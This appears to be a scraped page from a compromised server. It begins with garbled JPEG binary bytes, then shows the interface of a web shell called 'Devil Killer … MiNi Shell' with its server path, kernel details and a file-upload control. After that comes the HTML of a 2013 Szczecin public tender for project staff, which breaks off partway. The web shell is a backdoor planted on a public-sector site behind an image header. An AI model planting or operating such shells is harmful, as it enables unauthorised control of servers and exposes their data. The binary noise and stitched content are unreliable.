JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131224/536054-N-2013.html

<p class="kh_header"><b>Szczecin: Świadczenie usług personelu projektu Najlepszy w zawodzie w zakresie zadań realizowanych przez Zachodniopomorskie Centrum Edukacji Morskiej i Politechnicznej</b><br>
<b>Numer ogłoszenia: 536054 - 2013; data zamieszczenia: 24.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorskie Centrum Edukacji Morskiej i Politechnicznej , ul. Hoża 6, 71-699 Szczecin, woj. zachodniopomorskie, tel. 91 44 20 933, faks 91 44 20 516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zcemip.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług personelu projektu Najlepszy w zawodzie w zakresie zadań realizowanych przez Zachodniopomorskie Centrum Edukacji Morskiej i Politechnicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji:
Koordynatora projektu część I,
Pracownika obsługi finansowej projektu część II,
Asystenta Koordynatora ds. administracyjnych, rekrutacji, ewaluacji i monitoringu oraz nadzoru nad realizacją staży część III,

w zakresie działań realizowanych przez Gminę Miasto Szczecin Zachodniopomorskie Centrum Edukacji Morskiej i Politechnicznej w Szczecinie na rzecz projektu pn. Najlepszy w zawodzie, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki
Kod CPV 79421000-1 Usługi zarządzania projektem inne niż w zakresie robot budowlanych, 72224000-1 - Usługi doradcze w zakresie zarządzania projektem, 79.21.10.00 - Usługi księgowe, 69.20.23.0 - Usługi w zakresie księgowości.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 72.22.40.00-1, 79.21.10.00-0, 69.20.23.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować:
Dla części 1 - co najmniej jedną osobą, dedykowaną do pełnienia funkcji Koordynatora Projektu, która posiada wykształcenie wyższe magisterskie techniczne/zawodowe, pełniła funkcję koordynatora w min. 2 projektach szkoleniowych (w zakresie szkoleń zawodowych i kwalifikacyjnych) finansowanych ze środków zewnętrznych, w tym każdy z tych projektów musiał trwać powyżej 1 roku, realizowanych przez jednostkę administracji publicznej, o wartości powyżej 440 tys. zł każdy projekt.
Dla części 2 - co najmniej jedną osobą, dedykowaną do pełnienia funkcji Pracownika ds. obsługi finansowej , która posiada wykształcenie wyższe, uczestniczyła w rozliczaniu finansowym min. 3 projektów szkoleniowych finansowanych ze środków zewnętrznych, w tym każdy z tych projektów musiał trwać powyżej 1 roku, realizowanych przez jednostkę administracji publicznej, o wartości powyżej 440 tys. zł każdy projekt.
Dla części 3 - przynajmniej jedną osobą, dedykowaną do Pełnienia funkcji Asystenta Koordynatora ds. administracyjnych, rekrutacji, ewaluacji i monitoringu oraz nadzoru nad realizacją staży projektu  która posiada wykształcenie min. średnie, wykonywała czynności administracyjne (obsługa korespondencji, kompletowanie dokumentacji rozliczeniowej, monitoring postępu rzeczowego oraz realizacji harmonogramów) w min. 2 projektach szkoleniowych finansowanych ze środków zewnętrznych, w tym każdy z tych projektów musiał trwać powyżej 1 roku, realizowanych przez jednostkę administracji publicznej, o wartości powyżej 440 tys. zł każdy projekt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować:
Dla części 1 - co najmniej jedną osobą, dedykowaną do pełnienia funkcji Koordynatora Projektu, która posiada wykształcenie wyższe magisterskie techniczne/zawodowe, pełniła funkcję koordynatora w min. 2 projektach szkoleniowych (w zakresie szkoleń zawodowych i kwalifikacyjnych) finansowanych ze środków zewnętrznych, w tym każdy z tych projektów musiał trwać powyżej 1 roku, realizowanych przez jednostkę administracji publicznej, o wartości powyżej 440 tys. zł każdy projekt.
Dla części 2 - co najmniej jedną osobą, dedykowaną do pełnienia funkcji Pracownika ds. obsługi finansowej , która posiada wykształcenie wyższe, uczestniczyła w rozliczaniu finansowym min. 3 projektów szkoleniowych finansowanych ze środków zewnętrznych, w tym każdy z tych projektów musiał trwać powyżej 1 roku, realizowanych przez jednostkę administracji publicznej, o wartości powyżej 440 tys. zł każdy projekt.
Dla części 3 - przynajmniej jedną osobą, dedykowaną do Pełnienia funkcji Asystenta Koordynatora ds. administracyjnych, rekrutacji, ewaluacji i monitoringu oraz nadzoru nad realizacją staży projektu  która posiada wykształcenie min. średnie, wykonywała czynności administracyjne (obsługa korespondencji, kompletowanie dokumentacji rozliczeniowej, monitoring postępu rzeczowego oraz realizacji harmonogramów) w min. 2 projektach szkoleniowych finansowanych ze środków zewnętrznych, w tym każdy z tych projektów musiał trwać powyżej 1 roku, realizowanych przez jednostkę administracji publicznej, o wartości powyżej 440 tys. zł każdy projekt</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zcemip.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorskie Centrum Edukacji Morskiej i Politechnicznej w Szczecinie, ul. Hoża 6, 71 - 699 Szczecin, pok. 34 oraz pok. 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.01.2014 godzina 10:00, miejsce: Zachodniopomorskie Centrum Edukacji Morskiej i Politechnicznej w Szczecinie, ul. Hoża 6, 71 - 699 Szczecin, sekretariat Ośrodka Kształcenia Kursowego, pok. 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Najlepszy w zawodzie jest współfinansowany przez Unię Europejską
w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji Koordynatora projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje: Pełnienie funkcji Koordynatora projektu przez okres 21 miesięcy, w ilości 160 godzin na miesiąc w ramach projektu pn.: Najlepszy w zawodzie, którego przedmiot merytoryczny obejmuje szkolenia, staże u pracodawców oraz doradztwo zawodowe skierowane do uczniów Zachodniopomorskiego Centrum Edukacji Morskiej i Politechnicznej w Szczecinie z zakresu:
a)	Realizacji zajęć z programowania i obsługi obrabiarek sterowanych numerycznie CNC (Computerized Numerical Control - pol.: komputerowe sterowanie urządzeń numerycznych) - zajęcia dedykowane dla uczniów kształcących się w zakresie zawodów technik mechanik i mechatronik,
b)	Realizacji zajęć z zakresu techniki szybkiej i efektywnej nauki, warsztatu edukacji finansowej Cashflow, kursu fakturowania, rozwiązywania zadań w ramach wirtualnego laboratorium logistyczno - spedycyjnego i magazynowego oraz kursu operatora wózków podnośnikowych na uprawnienia Urzędu Dozoru Technicznego - zajęcia dedykowane uczniom kształcącym się w zakresie zawodu technik logistyk,
c)	Realizacji zajęć pozalekcyjnych z wykorzystaniem Symulatora ECDIS w wersji na 8 stanowisk ćwiczeniowych, umożliwiający przeprowadzenie zajęć z nawigacji, astronawigacji, nawigacji technicznej, manewrowania statkiem, ratownictwa morskiego (zajęcia stanowić będą podstawę do uzyskania certyfikatów operatorów systemów ECDIS oraz RADAR/ARPA) a także zagadnienia dotyczące portowego obrotu towarowego oraz aspekty podstawowego kursu dla operatorów portowych (obliczenie ilości ładunku metodą DRAFT SURVEY) - zajęcia dedykowane uczniom kształcącym się w zakresie zawodu technik nawigator,
d)	Realizacji zajęć z zawodowego języka obcego,
e)	Realizacji stażów u pracodawców oraz
f)	Realizacji doradztwa zawodowego i edukacyjnego

Obowiązki wykonawcy:

Część I:
a)	Zarządzanie i merytoryczny nadzór nad całością projektu, nad przygotowaniem wniosków o płatność,
b)	Przejęcie odpowiedzialności za całość realizacji projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach,
c)	Terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach,
d)	Stały nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym realizacją budżetu i harmonogramem finansowym,
e)	Kierowanie wykonaniem projektu, zgodnie z harmonogramem realizacji projektu oraz zawartą umową o dofinansowanie projektu a także wnioskiem aplikacyjnym                        i przepisami krajowymi oraz EFS,
f)	Stałe nadzorowanie bieżących postępów w realizacji projektu,
g)	Stały nadzór nad całością prac związanych z realizacją projektu i ich jakością,
h)	Zarządzanie planowanymi działaniami projektowymi,
i)	Koordynacja prac zespołu projektowego i podejmowanie decyzji,
j)	Dokonywanie podziału obowiązków pomiędzy członków zespołu projektowego,
k)	Stałe nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu,
l)	Koordynacja działań merytorycznych i logistycznych związanych z projektem,
m)	Utrzymywanie stałych kontaktów z Liderem oraz opiekunami projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach                 w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów               i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów,
n)	Stałe nadzorowanie terminowego sporządzania wniosków o płatność wraz                           z zebraniem wszystkich załączników,
o)	Przygotowanie i realizację zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych,
p)	Przygotowywanie i koordynacja korespondencji związanej z projektem do Lidera oraz Instytucji Pośredniczącej,
q)	Planowanie działań i wywiązywanie się ze wskaźników,
r)	Kierowanie bieżącymi sprawami związanymi z realizacją projektu,
s)	Koordynacja cateringu, realizacji stażów oraz doradztwa zawodowego,
t)	Stały nadzór nad bezpieczeństwem uczestników,
u)	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu,
v)	Zabezpieczenie obecności osoby dedykowanej do realizacji zadania podczas kontroli projektu,
w)	Weryfikacja dzienników zajęć, działań związanych z monitoringiem, ewaluacją, promocją projektu,
x)	Stałe nadzorowanie przebiegu zajęć,
y)	Stały nadzór nad jakością materiałów dydaktycznych,
z)	Stały nadzór nad opracowaniem szczegółowego harmonogramu zajęć,
aa)	Nadzór nad zaprojektowaniem ankiet ewaluacyjnych dla potrzeb ewaluacji,
bb)	Nadzór na monitoringiem i ewaluacją projektu oraz jego promocja,
cc)	Kontrola wydatkowania środków,
dd)	Przekazywanie Zamawiającemu sprawozdań z przebiegu wykonywania przedmiotu Umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji Pracownika ds. obsługi finansowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje: Pełnienie funkcji Pracownika ds. obsługi finansowej przez okres 21 miesięcy, w ilości 160 godzin/miesiąc w ramach projektu pn.: Najlepszy w zawodzie, którego zakres merytoryczny obejmuje szkolenia, staże u pracodawców oraz doradztwo zawodowe skierowane do uczniów Zachodniopomorskiego Centrum Edukacji Morskiej i Politechnicznej w Szczecinie z zakresu:

a)	Realizacji zajęć z programowania i obsługi obrabiarek sterowanych numerycznie CNC (Computerized Numerical Control - pol.: komputerowe sterowanie urządzeń numerycznych) - zajęcia dedykowane dla uczniów kształcących się w zakresie zawodów technik mechanik i mechatronik,
b)	Realizacji zajęć z zakresu techniki szybkiej i efektywnej nauki, warsztatu edukacji finansowej Cashflow, kursu fakturowania, rozwiązywania zadań w ramach wirtualnego laboratorium logistyczno - spedycyjnego i magazynowego oraz kursu operatora wózków podnośnikowych na uprawnienia Urzędu Dozoru Technicznego - zajęcia dedykowane uczniom kształcącym się w zakresie zawodu technik logistyk,
c)	Realizacji zajęć pozalekcyjnych z wykorzystaniem Symulatora ECDIS w wersji na 8 stanowisk ćwiczeniowych, umożliwiający przeprowadzenie zajęć z nawigacji, astronawigacji, nawigacji technicznej, manewrowania statkiem, ratownictwa morskiego (zajęcia stanowić będą podstawę do uzyskania certyfikatów operatorów systemów ECDIS oraz RADAR/ARPA) a także zagadnienia dotyczące portowego obrotu towarowego oraz aspekty podstawowego kursu dla operatorów portowych (obliczenie ilości ładunku metodą DRAFT SURVEY) - zajęcia dedykowane uczniom kształcącym się w zakresie zawodu technik nawigator,
d)	Realizacji zajęć z zawodowego języka obcego,
e)	Realizacji stażów u pracodawców oraz
f)	Realizacji doradztwa zawodowego i edukacyjnego,

Zakres obowiązków obejmuje:
a)	Przygotowywanie harmonogramów płatności,
b)	Opis dokumentów finansowych,
c)	Bieżące rozliczanie, przygotowanie wniosków o płatność, zmian projektowych,
d)	Monitoring wykonania budżetu,
e)	Kontakt z Liderem projektu oraz IP w zakresie finansowania projektu,
f)	Nadzór nad projektową dokumentacją finansową przygotowywaną przez pracowników księgowości ZCEMiP.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-0, 69.20.23.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji Asystenta Koordynatora ds. administracyjnych, rekrutacji, ewaluacji i monitoringu oraz nadzoru nad realizacją staży.</p>
